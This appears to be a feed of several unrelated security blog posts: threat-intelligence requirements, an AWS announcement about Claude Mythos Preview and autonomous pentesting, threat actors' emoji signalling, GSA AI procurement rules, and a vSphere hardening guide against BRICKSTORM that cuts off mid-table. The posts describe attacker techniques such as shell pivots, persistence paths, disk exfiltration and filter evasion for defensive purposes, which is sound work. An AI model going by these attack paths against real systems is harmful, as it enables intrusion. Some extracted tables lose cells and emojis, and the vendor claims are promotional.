Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment.
Why Intelligence Requirements Fall Flat and How to Fix Them with a Practical Priority Intelligence Requirements Framework
Blog
Why Intelligence Requirements Fall Flat and How to Fix Them with a Practical Priority Intelligence Requirements Framework
In this post, we examine why intelligence requirements often fail to drive decisions and how to operationalize Priority Intelligence Requirements to align collection, analysis, and action.

In modern security operations, the “more is better” approach to threat intelligence has failed. Teams are drowning in alerts, not because the tools aren’t working, but because they lack a defined “North Star” to tell them which signals actually matter.
To move from reactive monitoring to proactive defense, you need Priority Intelligence Requirements (PIRs).
| What is a Priority Intelligence Requirement (PIR)? |
| Definition: A Priority Intelligence Requirement is a decision-support question that identifies a critical knowledge gap. It defines what an organization needs to know, why it matters, and which specific business decision the information will support. |
What Are the Biggest Challenges in Implementing PIRs?
Most teams buy intelligence tools, connect their sources, and immediately hit a wall: What should we actually be looking for?
Without a requirements-driven intelligence model, programs typically suffer from three critical points of friction that teams face every day:
- Alert Parity: A low-level credential leak on a forum is treated with the same urgency as a targeted ransomware threat.
- The “So What?” Gap: Analysts produce reports that leadership finds “interesting” but not “actionable”.
- Analyst Burnout: Teams spend the majority of their time chasing “exploratory” data rather than defending the business.
Requirements-driven intelligence changes the starting point. It moves the focus from “What data can we get?” to “What decisions do we need to make?”

The 3-Tier Intelligence Requirements Model: GIR, PIR, and SIR
To operationalize intelligence, you must understand its hierarchy. A PIR is the bridge between executive strategy and technical execution. We recommend structuring requirements across these three tiers:
- General Intelligence Requirements (GIRs): The “Why”)
These are the big-picture risks that keep your CISO or Board up at night. They focus on trends and long-term posture.
Example: “How is the ransomware landscape evolving for the healthcare sector in 2026?”
Outcome: Informs budgeting and annual security priorities.
- Priority Intelligence Requirements (PIRs): The “What”
This is the operational heart of your program. PIRs turn strategic concerns into specific, high-impact scenarios.
Example: “Which ransomware groups are actively targeting our specific supply chain partners?”
Outcome: Defines daily monitoring and escalation triggers.
- Specific Intelligence Requirements (SIRs): The “How”
SIRs are the tactical “boots on the ground” that power your PIRs with granular data.
Example: “Monitor for [Specific Malware Family] indicators or [Specific Actor] infrastructure associated with Group X.”Outcome: Drives threat hunting and automated detection logic.
Why Should You Focus on Building at the PIR Level?
While you need the full hierarchy, your primary effort should live at the PIR layer.
General IRs are often too high-level to automate, and SIRs (technical indicators) change too quickly to manage manually. PIRs are the “Stable Middle.” They are broad enough to capture business risk but specific enough to map to a workflow. By building your program around a library of PIRs, you create a system that is:
- Machine-Readable: Easy to translate into platform automation.
- Stakeholder-Aligned: Written in language that leadership understands.
Action-Oriented: Designed to trigger a specific response every time they are “answered.”
How To Audit Your PIRs (The Stress Test)
Before you commit resources to monitoring, run each requirement through this three-point filter:
- Is it tied to a decision? If we learn the answer today, what specifically changes in our defense?
- Does it have an owner? Which specific stakeholder is accountable for acting on this information?
- Is it time-bound? Is this requirement evergreen, or active during a defined risk window?
For a more comprehensive view of your full threat intelligence picture, take the Threat Intelligence Capability Assessment.
Frequently Asked Questions About Priority Intelligence Requirements
What is the difference between PIRs and general monitoring goals?
PIRs are decision-driven requirements tied to specific risks. Monitoring goals (like “watch the dark web”) describe activities without defining a clear outcome.
How often should PIRs be updated?
PIRs should be revisited when decisions are made, risks shift, incidents occur, or strategic priorities change.
Can small security teams implement PIR frameworks?
Yes. In fact, smaller teams often benefit most because requirements help prioritize limited resources.
How do you measure PIR effectiveness?
Indicators include reduced alert noise, clearer reporting alignment, faster investigations, and improved stakeholder satisfaction.
Join the Webinar: How to Build and Operationalize Priority Intelligence Requirements
Register to learn how to define actionable PIRs that stakeholders actually care about and align intelligence to real business decisions.
Note: Attendees will receive our exclusive “Priority Intelligence Requirements Starter Kit,” which features a practical workbook and a PIR library.
Begin your free trial today.
The post Why Intelligence Requirements Fall Flat and How to Fix Them with a Practical Priority Intelligence Requirements Framework appeared first on Flashpoint.
Building AI defenses at scale: Before the threats emerge
At AWS, we’ve spent decades developing processes and tools that enable us to defend millions of customers simultaneously, wherever they operate around the world. AI has been an extremely helpful addition to the automation our security and threat intelligence teams do every day, and we’re still early in this journey. Our AI-powered log analysis system has reduced the time SecOps engineers spend analyzing security logs from an average of six hours to just seven minutes, a 50x productivity increase that lets us detect and respond to threats faster than ever. Across AWS, we analyze over 400 trillion network flows per day to detect patterns that signal emerging threats. In 2025 alone, we blocked over 300 million attempts to maliciously encrypt customer files hosted on Amazon S3. At this scale, every improvement in our operations helps protect all customers. AI is already helping us make our defenses stronger for everyone, and I’m excited to see that improvement continue.
A new class of AI for cybersecurity
Today, Anthropic announced Project Glasswing, a cybersecurity initiative designed to secure the world’s most critical software and advance the cybersecurity practices the industry will need as AI grows more capable. Organizations that build or maintain critical digital infrastructure are getting early access to Claude Mythos Preview, a new class of AI model, to find and patch vulnerabilities in the systems the world depends on. Given our role in securing some of the world’s most essential infrastructure, AWS is playing an integral part in advancing this work.
As part of Project Glasswing, we’ve already applied Claude Mythos Preview to critical AWS codebases that undergo continuous AI-powered security reviews, and even in those well-tested environments, it’s helped us identify additional opportunities to strengthen our code. In our internal testing, Claude Mythos Preview has proven more productive than previous models at surfacing security findings, requiring less manual guidance from our engineers to deliver actionable results. We’ve also given early access to a select group of AWS customers, who are deploying Claude Mythos Preview in their own security workflows and helping shape how the model evolves.
As AI tools grow more powerful in their ability to identify security issues, so must our ability to use them defensively. To that end, we’ve been working closely with Anthropic to help ensure Claude Mythos Preview is ready for enterprise use. AWS is Anthropic’s primary cloud provider for mission-critical workloads, safety research, and foundation model development. More broadly, AWS provides the foundational infrastructure that the world’s leading AI companies rely on to build, train, and deploy their most advanced models. We’re bringing decades of security experience to this partnership, helping to ensure Claude Mythos Preview is ready for even more organizations to build upon and operate securely at scale.
Claude Mythos Preview signals an upcoming wave of models that can find vulnerabilities and build working exploits at a scale and speed we haven’t seen before. Anthropic and AWS are taking a deliberately cautious approach to release. Access begins with a small number of organizations, prioritizing internet-critical companies and open-source maintainers whose software and digital services impact hundreds of millions of users. The goal: find and fix vulnerabilities in the world’s most critical software. Claude Mythos Preview is available in gated research preview through Amazon Bedrock with enterprise-grade security controls, including customer-managed encryption, VPC isolation, and detailed logging, so your team can explore Claude Mythos Preview’s capabilities without exposing production assets to unnecessary risk.
AWS architects services with security at the core
Our work with Project Glasswing is grounded in a philosophy we’ve developed over two decades of securing mission-critical workloads: you can’t wait for threats to materialize before building your defenses. You have to look around corners, adopt new technologies, build protections first, deploy them in your own operations at scale, and refine them based on what you learn.
That’s exactly what we’ve done at AWS with AI and security. Our approach spans the full spectrum: proactive defense through threat hunting and vulnerability research, dynamic response to active campaigns, and third-party certifications that verify our security practices meet the highest industry standards. This operational experience has taught us where AI accelerates security work and where human judgment remains essential. And it’s reinforced that security innovation must be pragmatic: proven in production before we ask you to rely on it.
That’s also why we help define what secure AI looks like. We became the first major cloud provider to achieve ISO 42001 certification for AI services. We’re active participants in OWASP, the Coalition for Secure AI, and the Frontier Model Forum. And we co-founded the Open Cybersecurity Schema Framework (OCSF) to enable better threat intelligence sharing across the ecosystem. The AWS Nitro System provides mathematically proven isolation for workloads. Systems and services like KMS, Nitro, EKS, and Lambda are designed with zero-operator access architectures, meaning AWS personnel can’t access your data. These aren’t aspirational goals. They’re how we operate today, at scale, every day.
Amazon Bedrock is where these principles come to life for AI. Bedrock provides policy-enforced access controls, built-in evaluation tools to measure how effectively models identify and validate vulnerabilities, and the ability to run workloads inside your own virtual private cloud. AWS is also the first cloud provider to achieve FedRAMP High and Department of Defense Security Requirements Guide Impact Level 4 and 5 authorizations for generally available Claude foundation models. Amazon Bedrock is already where the most security-sensitive organizations trust Anthropic’s technology, and it makes perfect sense for Claude Mythos Preview.
How to get started today
The same principles that guide our work at AWS scale apply regardless of which AI tools you’re using: comprehensive observability, defense in depth, automation where it adds value, and human judgment where it’s essential. Here’s how to put them into practice.
Prepare for the next generation of AI security. Claude Mythos Preview signals an upcoming wave of AI models that will transform cybersecurity. Start strengthening your security posture now so your organization is ready as these capabilities become more broadly available. Claude Mythos Preview is available in gated preview through Amazon Bedrock, and access is limited to an initial allow-list of organizations. If your organization has been allow-listed, your AWS account team will reach out directly.
Run on-demand penetration testing with AWS Security Agent. Now generally available, AWS Security Agent delivers autonomous penetration testing that operates 24/7 at a fraction of the cost of manual penetration tests. It transforms penetration testing from a periodic bottleneck into an on-demand capability that scales with your development velocity across AWS, Azure, GCP, other cloud providers, and on-premises. AWS Security Agent represents a new class of frontier agents: autonomous systems that work independently to achieve goals, scale to tackle concurrent tasks, and run persistently without constant human oversight. It deploys specialized AI agents to discover, validate, and report security vulnerabilities through sophisticated multi-step scenarios. Unlike traditional scanners that generate findings without validation, AWS Security Agent identifies potential vulnerabilities, then attempts to exploit them with targeted payloads and attack chains to confirm they are legitimate security risks. Each finding includes CVSS risk scores, application-specific severity ratings, detailed reproduction steps, and remediation suggestions. The result: penetration testing that once took weeks now completes in hours, scales across your entire application portfolio, and helps you get started with remediation instead of leaving you with a report. New customers can explore AWS Security Agent with a 2-month free trial.
Build AI applications you can trust with Amazon Bedrock. For teams building with generative AI, the challenge isn’t just making AI work, it’s making AI work safely. Amazon Bedrock provides the security and safety controls you need to deploy AI responsibly. Its Automated Reasoning capability is the first and only AI safeguard to use formal logic to help prevent factual errors from hallucinations, providing verifiable explanations with 99% accuracy, a capability we’ve refined over more than a decade of applying formal methods across AWS storage, identity, and networking. Amazon Bedrock also provides customizable guardrails that block harmful content and enforce your content policies, along with comprehensive observability to track AI behavior and detect anomalies across your workloads.
The threat landscape isn’t waiting
The threat landscape isn’t waiting for us to catch up. Nation-state actors, ransomware operators, and supply chain attackers are already using AI to scale their operations. Our job is to stay ahead by building defenses first, deploying them at scale, and sharing what we learn so the entire community benefits.
That’s what we do every day at AWS. We build in security from the start, ensuring it works and scales before we ask customers to rely on it. We set standards rather than follow them. And we look around corners to address tomorrow’s challenges today.
As AI capabilities continue to evolve, this approach won’t change. We’ll keep building defenses first, refining them at scale, and working with partners like Anthropic to ensure the next generation of AI security tools meets the real-world needs of enterprises defending at this scale.
Learn More
- Get started with AWS Security Agent
- Explore Amazon Bedrock Guardrails for AI content safety
- See how we’re Securing AI at AWS
- Learn about AWS Responsible AI
- Read about AWS AI Compliance
- Review our AWS Security Bulletins on emerging threats
If you have feedback about this post, submit comments in the Comments section below.
The Language of Emojis in Threat Intelligence: How Adversaries Signal, Obfuscate, and Coordinate Online
Blog
The Language of Emojis in Threat Intelligence: How Adversaries Signal, Obfuscate, and Coordinate Online
In this post, we examine how threat actors use emojis across illicit communities, how these symbols function as a form of coded language, and why understanding this form of communication is increasingly critical for threat intelligence teams.

As threat actor activity continues to shift toward informal, fast-moving communication platforms such as Telegram and Discord, the way adversaries communicate is evolving. Emojis, often dismissed as casual or nontechnical, have become a meaningful part of that evolution.
Across illicit forums, messaging apps, and closed communities, emojis are used not just for expression, but for signaling intent, categorizing activity, and, in some cases, obscuring meaning from outsiders. For analysts, this introduces an additional layer of context that can influence how communications are interpreted, prioritized, and actioned.
Emojis as a Functional Layer of Communication
Within threat actor communities, emoji usage is often structured and repeatable.
Rather than replacing language entirely, emojis act as a functional overlay — reinforcing key concepts, highlighting important information, and accelerating communication in high-volume environments.
This is especially common in:
- Telegram fraud channels
- Phishing and carding communities
- Service marketplaces and access broker groups
In these environments, speed and clarity matter. Emojis allow actors to quickly scan messages, identify relevant content, and engage without parsing long text-based posts.
Common Emoji Categories and What They Signal
Flashpoint analysis of illicit communities shows that emoji usage tends to cluster around a set of recurring categories. While meanings can vary slightly by group, several patterns appear consistently.
Financial Activity and Monetization
Emojis related to money are among the most frequently used.
Common examples include:
/
— Profit, successful fraud, or payouts
— Credit cards, carding activity, or stolen payment data
— Banks or financial institutions
— Cryptocurrency-related activity
These symbols often appear in sales posts, fraud logs, or success claims, helping actors quickly identify opportunities tied to financial gain.
Access, Credentials, and Compromise
Another cluster of emoji usage centers on access and account compromise, where symbols are used to signal the availability of credentials, successful intrusions, or control over compromised systems.
Examples include:
— Credentials or account access
— Successful breach or unlocked account
/
— Data exfiltration or transfer
— Databases or collections of stolen data
In many cases, these emojis are used in combination with minimal text, allowing actors to advertise access or share results without detailed descriptions.
Tools, Automation, and Services
Emojis are also used to signal tooling and service offerings.
Examples include:
— Bots, automation tools, or malware
— Configuration, setup, or infrastructure
— Toolkits or bundled services
— Infrastructure, communication channels, or delivery mechanisms
These are commonly seen in phishing-as-a-service, SMS gateway services, and malware distribution communities.
Targets and Geography
Threat actors frequently use emojis to represent targets or regions.
Examples include:
— Corporate or enterprise targets
— Targeting or “hits”
— Specific targets, drop locations, or points of interest
— Global campaigns- Country flags — Specific geographic targeting
This allows actors to signal targeting scope quickly, particularly in multilingual or international groups.
Urgency, Success, and Status
Some emojis are used to communicate momentum or importance.
Examples include:
— High-value or trending activity
— Verified success or working method
— Urgent update or active campaign
— Growth or increased results
These signals are particularly important in fast-moving channels where actors compete for attention.
Emojis as a Tool for Obfuscation
Beyond signaling, emojis are also used to evade detection.
Threat actors may substitute emojis for keywords associated with:
- Fraud techniques
- Financial activity
- Specific platforms or services
For example, replacing “credit card” with
or “bank” with
can help bypass basic keyword filters or reduce visibility in automated moderation systems.
When combined with slang, abbreviations, and multilingual phrasing, this creates a layered form of obfuscation that complicates large-scale monitoring efforts.
Building Identity and Reputation Through Emoji Patterns
Emoji usage is not just functional. It can also be behavioral.
Over time, actors often develop recognizable patterns in how they use emojis:
- Consistent combinations in sales posts
- Repeated formatting styles
- Unique ways of structuring messages
These patterns can serve as lightweight identifiers, helping analysts:
- Track the same actor across different channels
- Identify reposted or syndicated content
- Link activity between platforms
In ecosystems where aliases frequently change, these subtle patterns can provide additional attribution signals.
Cross-Language Communication in Global Threat Ecosystems
Illicit communities are inherently global, spanning multiple languages and regions.
Emojis provide a shared visual layer that allows actors to communicate core concepts without relying entirely on text. This is particularly valuable in:
- Large Telegram channels with international membership
- Cross-border fraud operations
- Decentralized marketplaces
For example, a combination of
+
+
can communicate “global carding opportunity” without requiring a shared language.
This ability to compress meaning into visual shorthand helps scale operations and coordination across diverse actor networks.
Context Still Determines Meaning
Despite these patterns, emoji usage is not universal or fixed.
The same emoji can carry different meanings depending on:
- The platform (Telegram vs. Discord vs. forums)
- The specific community
- The surrounding text and context
For example,
may indicate “high value” in one group, but simply “active discussion” in another.
For analysts, this reinforces the need to treat emojis as contextual signals, not standalone indicators. Accurate interpretation depends on understanding the broader communication environment.
What This Means for Threat Intelligence Teams
Emoji usage reflects a broader shift in how threat actors communicate toward faster, more visual, and more adaptive forms of interaction.
Flashpoint assesses that incorporating emoji analysis into intelligence workflows can enhance:
- Detection of emerging campaigns
- Identification of high-value activity
- Attribution and actor tracking
- Interpretation of intent and sentiment
While emojis alone are not decisive indicators, they provide an additional layer of signal that can strengthen overall analysis.
Supporting Security Teams with Threat Intelligence
Understanding how threat actors communicate down to the symbols they use provides critical context for identifying and interpreting emerging threats.
Flashpoint delivers intelligence that helps organizations monitor illicit communities, track evolving communication patterns, and translate raw data into actionable insights. Within the Flashpoint platform, analysts can search across environments like Flashpoint Ignite and Echosec using emojis alongside keywords—enabling more precise discovery of relevant conversations, signals, and emerging activity that might otherwise be missed.
This approach allows teams to capture nuance in how threat actors communicate, improving detection, attribution, and overall situational awareness.
To learn how Flashpoint can support your team with real-time intelligence and analysis, request a demo.
Begin your free trial today.
The post The Language of Emojis in Threat Intelligence: How Adversaries Signal, Obfuscate, and Coordinate Online appeared first on Flashpoint.
Tech Nonprofits to Feds: Don’t Weaponize Procurement to Undermine AI Trust and Safety
While the very public fight continues between the Department of Defense and Anthropic over whether the government can punish a company for refusing to allow its technology to be used for mass surveillance, another agency of the U.S. government is quietly working to ensure that this dispute will never happen again. How? By rewriting government procurement rules.
Using procurement — meaning, the processes by which governments acquire goods and services — to accomplish policy goals is a time-honored and often appropriate strategy. The government literally expresses its politics and priorities by deciding where and how it spends its money. To that end, governments can and should give our tax dollars to companies and projects that serve the public interest, such as open-source software development, interoperability, or right to repair. And they should withhold those dollars from those that don’t, like shady contractors with inadequate security systems.
New proposed rules for the principal agency in charge of acquiring goods, property, and services for the federal government, the General Services Administration (GSA), are supposed to be primarily an effort to implement one policy priority: promoting “ideologically neutral” American AI innovation. But the new guidelines do far more than that.
As explained in comments filed today with our partners at the Center for Democracy and Technology, the Protect Democracy Project, and the Electronic Privacy Information Center, the GSA’s guidelines include broad provisions that would make AI tools less safe and less useful. If finally adopted, these provisions would become standard components of every federal contract. You can read the full comments here.
The most egregious example is a requirement that contractors and government service providers must license their AI systems to the government for “all lawful purposes.” Given the government’s loose interpretations of the law, ability to find loopholes to surveil you, and willingness to do illegal spying, we need serious and proactive legal restrictions to prevent it from gobbling up all the personal data it can acquire and using even routine bureaucratic data for punitive ends.
Relatedly, the draft rules require that “AI System(s) must not refuse to produce data outputs or conduct analyses based on the Contractor’s or Service Provider’s discretionary policies.” In other words, if a company’s safety guardrails might prevent responding to a government request, the company must disable those guardrails. Given widespread public concerns about AI safety, it seems misguided, at best, to limit the safeguards a company deems necessary.
There are myriad other problems with the draft rules, such as technologically incoherent “anti-Woke” requirements. But, the overarching problem is clear: much of this proposal would not serve the overall public interest in using American tax dollars to promote privacy, safety, and responsible technological innovation. The GSA should start over.

vSphere and BRICKSTORM Malware: A Defender's Guide
Written by: Stuart Carrera
Introduction
Building on recent BRICKSTORM research from Google Threat Intelligence Group (GTIG), this post explores the evolving threats facing virtualized environments. These operations directly target the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors. To help organizations stay ahead of these risks, we will focus on the essential hardening strategies and mitigating controls necessary to secure these critical assets.
By establishing persistence at the virtualization layer, threat actors operate beneath the guest operating system where traditional security protections are ineffective. This strategy takes advantage of a significant visibility gap, as these control planes do not support standard endpoint detection and response (EDR) agents and have historically received less security focus than traditional endpoints.
This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, these intrusions rely on the effectiveness of exploiting weak security architecture and identity design, a lack of host-based configuration enforcement, and limited visibility within the virtualization layer. By operating within these unmonitored areas, attackers can establish long-term persistence and gain administrative control over the entire vSphere environment.
Figure 1: BRICKSTORM vSphere attack chain
This guide provides a framework for an infrastructure-centric defense. To help automate some of this guidance and secure the control plane against threats like BRICKSTORM, Mandiant released a vCenter Hardening Script that enforces these security configurations directly at the Photon Linux layer. By implementing these recommendations, organizations can transform the virtualization layer into a hardened environment capable of detecting and blocking persistent threats.
vCenter Server Appliance Risk Analysis
The vCenter Server Appliance (VCSA) is the central point of control and trust for the vSphere infrastructure. Running on a specialized Photon Linux operating system, the VCSA typically hosts critical Tier-0 workloads, such as domain controllers and privileged access management (PAM) solutions. This means the underlying virtualization platform inherits the same classification and risk profile as the highly sensitive assets it supports.
A compromise of the vCenter control plane grants an attacker administrative control over every managed ESXi host and virtual machine, effectively rendering traditional organizational tiering irrelevant. Because the VCSA is a purpose-built appliance, relying on out-of-the-box defaults is often insufficient; achieving a Tier-0 security standard requires intentional, custom security configurations at both the vSphere and the underlying Photon Linux layers.
For a threat actor, the VCSA provides:
-
Centralized Command: This provides the ability to power off, delete, or reconfigure any virtual machine combined with the ability to reset root credentials on any managed ESXi host providing full control of the hypervisor.
-
Total Data Access: Access to the underlying storage (VMDKs) of every application, bypassing operating system permissions and traditional file system security. This provides a direct path for data exfiltration of Tier-0 assets.
-
Command-Line Logging Gaps: If an attacker gains access to the underlying Photon OS shell via Secure Shell (SSH), there is no remote logging of the shell commands.
Management Plane Dependencies
Many organizations host their Active Directory domain controllers as virtual machines (VMs) within the same vSphere cluster managed by a vCenter that is itself AD-integrated. If an attacker disables the virtual network or encrypts the datastores, vCenter loses its ability to authenticate administrators. In a scenario where the VCSA is encrypted or wiped, the tools required for large-scale recovery are also lost. This forces organizations to rely on manual restores via individual ESXi hosts, extending the recovery timeline exponentially.
vSphere 7 End of Life
vSphere 7 reached End of Life (EoL) in October 2025. Organizations with this legacy technical debt will have vSphere software entering a window (until upgrade) where they will no longer receive critical security patches. This provides an opportunity for threat actors to exploit known vulnerabilities that will not be fixed.
The Strategic Advantage of Proactive Measures
To secure the control plane, organizations should adopt a strategy where the infrastructure itself acts as the primary line of defense.
A resilient defense relies on two strategies:
- Technical Hardening: Defense-in-depth should be applied to the hypervisor layer to reduce the attack surface. Threat actors target insecure defaults. Hardening measures, such as enabling Secure Boot, strictly firewalling management interfaces, and disabling shell access, create “friction.” When a threat actor attempts to write a persistence script to
/etc/rc.local.dor modify a startup file, a hardened configuration can block the action or force the actor to use methods that generate excessive log telemetry. -
High-Fidelity Signal Analysis: Threat actors are adept at rotating infrastructure and recompiling tools to change their signatures. Relying on a blocklist of bad IPs or a database of known malware hashes is not an effective strategy as threat actors utilize command-and-control servers and native binaries. Instead, the focus should shift entirely to behavioral patterns.
Building on this strategic foundation where the infrastructure itself acts as the primary line of defense, this guide outlines four phases of technical enforcement:
-
Phase 1: Benchmarking and Base Controls – Establishing the foundation with Security Technical Implementation Guides (STIG) and patching.
-
Phase 2: Identity Management – Hardening administrative access to critical infrastructure via PAWs and PAM solutions.
-
Phase 3: vSphere Network Hardening – Eliminating lateral movement with Zero Trust networking.
-
Phase 4: Logging and Forensic Visibility – Transforming the appliance into a proactive security sensor.
Phase 1: Benchmarking and Base Controls
Organizations should use the hardening measures outlined in the Mandiant vSphere hardening blog post combined with a strict patching and upgrade strategy. This provides a standard foundation to develop a strong security posture. By implementing an enhanced security baseline centered on the Photon Linux DISA STIG and VMware security hardening guides, organizations can harden the OS-level components that actors target.
Key Frameworks:
STIG Control Mappings to Attacker TTPs
|
STIG ID |
Control Title |
TTP |
Detail |
|
Require Multi-factor authentication (MFA) |
Establish Foothold / Privilege Escalation |
MFA on vCenter web login prevents compromised Active Directory credentials from granting full access. |
|
|
Real-time Alert on SSO Account Actions |
Persistence / Anti-Forensics |
Creates local accounts, deploys backdoors, and deletes the accounts within minutes. Real-time alerting on PrincipalManagement events is required to catch this activity. |
|
|
Verify User Roles (Least Privilege) |
Data Exfiltration |
Identifies and removes excessive permissions from standard user roles that are aggregated into non-admin roles. |
|
|
Limit membership to "BashShellAdministrators" |
Escalate Privileges |
Even if an attacker compromises a vSphere Admin account, they cannot access the Photon OS bash shell unless that account is in this specific single sign-on (SSO) group. It blocks the "VAMI-to-Shell" pivot used to deploy backdoors. |
|
|
Disable SSH Enablement |
Initial Access |
Actors often use the VAMI (Port 5480) to enable SSH before deploying the backdoor. This control ensures that SSH is "Disabled." |
vSphere Infrastructure-Level Data Exfiltration
Standard vSphere configurations typically mask high-risk permissions such as VM cloning and exporting within generalized administrative roles, allowing these actions to blend into the background noise of routine operations. This architecture provides a threat actor with the means to execute a silent exfiltration of a domain controller or credential repository. Organizations should transition from a model of permissive vSphere access control to a comprehensive cryptographic enforcement policy.
|
Security Control |
What It Protects Against |
Implementation Method |
|
vSphere VM Encryption |
Theft of VMDK files from the datastore; offline analysis and snapshot of memory |
Enable in VM Policies (Requires a KMS) |
|
In-Guest Encryption (BitLocker) |
Mounting the VMDK to another VM; offline file system browsing |
Enable inside Windows OS (Requires a vTPM) |
|
vMotion Encryption |
Capture of in-memory credentials (krbtgt hashes) during live migration |
Set vMotion to "Required" in VM Options |
|
Virtual TPM (vTPM) & Secure Boot |
Bootkit persistence and tampering; strengthens in-guest features like Credential Guard |
Enable in VM Options (Hardware & Boot sections) |
|
Lock Boot Order & BIOS |
Booting from a malicious ISO to reset passwords or bypass security controls |
Set a VM BIOS password and configure boot options |
|
Disable Copy/Paste |
Silent data exfiltration of credentials or secrets via the VM console |
Set VM Advanced Settings ( |
Resilience against vSphere data exfiltration requires a shift in how high-value virtual assets are governed:
-
Mandatory Tier-0 Encryption: The enforcement of vSphere-native VM encryption is the primary and most essential control for all critical Tier-0 virtual machines. Organizations should mandate that every domain controller, certificate authority, and password vault be encrypted at the virtual machine level.
-
Cryptographic Isolation: Tier-0 assets should be subject to a unique key-locked encryption policy. By mandating a separate key management server (KMS) cluster for these workloads, organizations ensure that a threat actor cannot unlock a cloned disk without access to a secure, hardware-backed vault.
-
Entitlement De-coupling: The "Clone" and "Export" privileges should be stripped from standard administrative roles. These functions should be reassigned to a highly restricted, auditable "break-glass" identity, used exclusively for emergency recovery scenarios.
Phase 2: Identity Management
Best practices for Identity management in vSphere focuses on mandating all vSphere administrative sessions originate from dedicated privileged access workstations and utilize a PAM while also enforcing host-level hardening through the restriction of the vpxuser shell access.
Privileged Access Workstations (PAWs)
To prevent a threat actor from pivoting to the virtualization management plane from compromised user endpoints or appliances, administrative sessions should originate from a dedicated PAW. This is a dedicated hardened workstation only utilized when interfacing with vSphere administrative functions or interfaces.
Privileged Access Management (PAM)
PAM tools serve as an intermediary to mitigate specific threats such as the BRICKSTEAL credential harvester. By mandating credential injection, organizations ensure that passwords are never typed or exposed in memory on the target system where malware could intercept them. Automated secret rotation should be enforced to limit the lifespan of any compromised credentials, particularly for root passwords and service account keys.
Authentication and Platform Hardening
Accounts residing in the default vsphere.local single sign-on (SSO) domain, most notably the built-in administrator@vsphere.local superuser, pose a specific security risk because they do not support modern MFA integration. Due to this limitation, organizations should limit the use of vsphere.local accounts for daily administration; instead, they should be treated as emergency "break-glass" credentials that are secured with complex, vaulted passwords.
The vSphere VPXUSER
The vpxuser is a high-privilege system account provisioned by vCenter on each managed host to facilitate core infrastructure management operations.
A threat actor possessing administrative control over the VCSA effectively inherits the delegated authority of the vpxuser across the entire managed cluster. This entitlement enables a pivot from the management plane to the host-level shell.
The Primary Mitigation (vSphere ESXi 8.0+): Disabling Shell Access
To mitigate this lateral movement vector, vSphere 8.0 introduced a technical control allowing administrators to remove shell access from the vpxuser account. Enforce the following configuration on all ESXi 8.0+ hosts to restrict the vpxuser identity:
esxcli system account set -i vpxuser -s falseESXi Host Identity Hardening Strategy
Additional hardening measures to prevent bypasses via alternative mechanisms, such as Host Profile manipulation, include:
|
Control Type |
Strategic Requirement |
Implementation Method |
|
Pivot Mitigation |
VPXUSER Shell Lock |
Disable shell access for the management account to sever the vCenter-to-Host attack path. |
|
Account Obfuscation |
Rename root Account |
Transition the default |
|
Credential Entropy |
15+ Character Baseline |
Enforce a strict, system-wide password complexity policy using |
|
Vaulted Identity |
Secure Credentials |
Mandate the use of an enterprise password vault for all local host credentials to ensure auditable "break-glass" access. |
Phase 3: vSphere Network Hardening
Securing the Virtualization Network
Establishing a vSphere Zero Trust network posture is the foundational requirement for securing a resilient Tier-0 architecture. Because the vCenter Server Appliance (VCSA) and ESXi hypervisors lack native MFA support for local privileged accounts, identity-based validation is insufficient as a singular point of security enforcement. Once a threat actor harvests these credentials, the logical network architecture remains the only defensive layer capable of preventing the threat actor's access to the vSphere management plane.
| A strictly segmented architecture integrating physical network isolation with host-based micro-segmentation serves as the definitive safeguard; by systematically eliminating all logical network paths from untrusted zones to the management zone, the underlying attack vector is neutralized, ensuring that a BRICKSTORM intrusion remains physically and logically incapable of compromising the vCenter control plane. |
The architectural blueprint shown in Figure 2 is designed to eliminate these common internal attack vectors.
Figure 2: vSphere Zero Trust networking and detection
1. Immutable Virtual Local Area Network (VLAN) Segmentation
Organizations should enforce isolation through distinct 802.1Q VLAN IDs. Threat actors will exploit "flat" or poorly partitioned networks where a compromise in a low-security/low-trust zone (such as a demilitarized zone [DMZ] or edge appliance) can route directly to the Management VAMI (Port 5480) or shell access to the VCSA (Port 22) high-trust network segments.
|
VLAN |
Description |
Members |
Strategic Security Policy |
|
Host Management |
ESXi Hypervisor Control Plane |
ESXi vmk0 Management Interfaces |
Restricted Access. Exclusively accepts traffic from the VCSA and authorized PAWs. |
|
VCSA / Infrastructure |
Cluster Management Applications |
vCenter (VCSA), Backup Servers, NSX Managers |
Tier-0 Restricted Zone. Should be logically and physically unreachable from all Guest VM segments. |
|
vMotion |
Live Memory Migration |
ESXi vmk1 (vMotion Stack) |
Non-Routable. Prevents interception of unencrypted RAM data during migration. |
|
Storage |
vSAN / iSCSI / NFS |
ESXi vmk2 (Storage Stack) |
Non-Routable. Critical for block-level data integrity; prevents out-of-band disk manipulation. |
|
Virtual Machine |
Production Workloads |
Virtual Machine Port Groups |
Untrusted Zone. Entirely isolated from all infrastructure management VLANs. |
2. Routing as a Security Barrier
The objective is to transform the Management Network into a secured zone. A threat actor residing on a standard corporate subnet or Wi-Fi network should be physically unable to communicate with the VCSA.
A. Virtual Routing and Forwarding (VRF) Segmentation
-
Action: Transition all Infrastructure VLANs into a dedicated VRF instance on the core routing layer.
-
Strategic Impact: This creates a defined routing table. Even in the event of a total compromise in the "User" or "Guest" VRF, the network hardware will have no route to the "Management" VRF, preventing lateral movement even if physical adjacency exists.
B. Privileged Admin Workstation (PAW Exclusive Access)
-
Action: Deconstruct all direct routes from the general corporate LAN to the Management Subnet(s).
-
Strategic Impact: Access to the Management Subnet should originate from a designated PAW IP range / subnet. All other internal subnets including standard user workstations, and guest VMs should have no route or be subject to an explicit Deny policy at the gateway. This forces the threat actor to attempt a compromise of the PAW, a significantly more hardened and monitored target, before they can connect to the VCSA.
3. Hardened Perimeter Ingress and Egress Filtering
These rules should be enforced at the hardware firewall or Layer 3 Core acting as the gateway for the Management Subnet. Because the VCSA's GUI-based native firewall is architecturally incapable of enforcing egress (outbound) policy, the upstream network gateway should enforce this policy. Organizations should implement a restrictive egress policy to ensure that if a VCSA is compromised, it cannot connect to malicious command-and-control infrastructure or exfiltrate Tier-0 data.
A. Ingress Filtering (Incoming to Management)
|
Source |
Destination |
Protocol / Port |
Policy |
Mitigation |
|
PAW |
Mgmt VLAN |
TCP / 443 |
ALLOW |
Authorized vSphere Client/API Access |
|
PAW |
ESXi VLAN |
TCP / 902 |
ALLOW |
